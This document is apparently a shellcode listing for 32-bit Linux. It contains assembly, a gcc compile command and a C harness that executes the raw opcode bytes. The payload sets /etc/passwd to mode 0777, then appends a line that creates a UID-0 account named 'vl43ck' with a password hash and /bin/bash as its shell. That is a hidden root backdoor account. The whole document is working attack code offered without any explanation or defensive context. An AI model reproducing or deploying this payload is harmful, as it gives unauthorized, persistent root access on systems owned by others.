xor eax, eax
push eax
push 0x64777373
push 0x61702f63
push 0x74652f2f
xor ebx, ebp
lea ebx, [esp]
xor ecx, ecx
mov cx, 0x1ff
mov al, 0xf
int 0x80
;add user in /etc/passwd
;open /etc/passwd
xor eax, eax
mov al, 5
xor ecx, ecx
mov cx, 2001Q
int 0x80
;write into /etc/passwd
xor ebx, ebx
mov ebx, eax
jmp short call_write
write:
pop ecx
xor eax, eax
xor edx, edx
mov dx, 132
mov al, 4
int 0x80
; close /etc/passwd
xor eax, eax
mov al, 6
int 0x80
;exit gracefully
push eax
xor eax, eax
mov al, 1
xor ebx, ebx
pop ebx
int 0x80
call_write:
call write
shellcode: db "vl43ck:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:vl43ck:/tmp:/bin/bash"
----------------------(COMPILE)-------------------------
gcc -m32 -fno-stack-protector -z execstack -o shellcode shellcode.c
----------------------(C-Code)--------------------------
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x31\xeb\x8d\x1c\x24\x31\xc9\x66\xb9\xff\x01\xb0\x0f\xcd\x80\x31\xc0\xb0\x05\x31\xc9\x66\xb9\x01\x04\xcd\x80\x31\xdb\x89\xc3\xeb\x1d\x59\x31\xc0\x31\xd2\x66\xba\x84\x00\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x50\x31\xc0\xb0\x01\x31\xdb\x5b\xcd\x80\xe8\xde\xff\xff\xff\x76\x6c\x34\x33\x63\x6b\x3a\x24\x36\x24\x62\x78\x77\x4a\x66\x7a\x6f\x72\x24\x4d\x55\x68\x55\x57\x4f\x30\x4d\x55\x67\x64\x6b\x57\x66\x50\x50\x45\x79\x64\x71\x67\x5a\x70\x6d\x2e\x59\x74\x50\x4d\x49\x2f\x67\x61\x4d\x34\x6c\x56\x71\x68\x50\x32\x31\x4c\x46\x4e\x57\x6d\x53\x4a\x38\x32\x31\x6b\x76\x4a\x6e\x49\x79\x6f\x4f\x44\x59\x74\x42\x68\x2e\x53\x46\x39\x61\x52\x37\x63\x69\x51\x42\x52\x43\x63\x77\x35\x62\x67\x6a\x58\x30\x3a\x30\x3a\x30\x3a\x76\x6c\x34\x33\x63\x6b\x3a\x2f\x74\x6d\x70\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}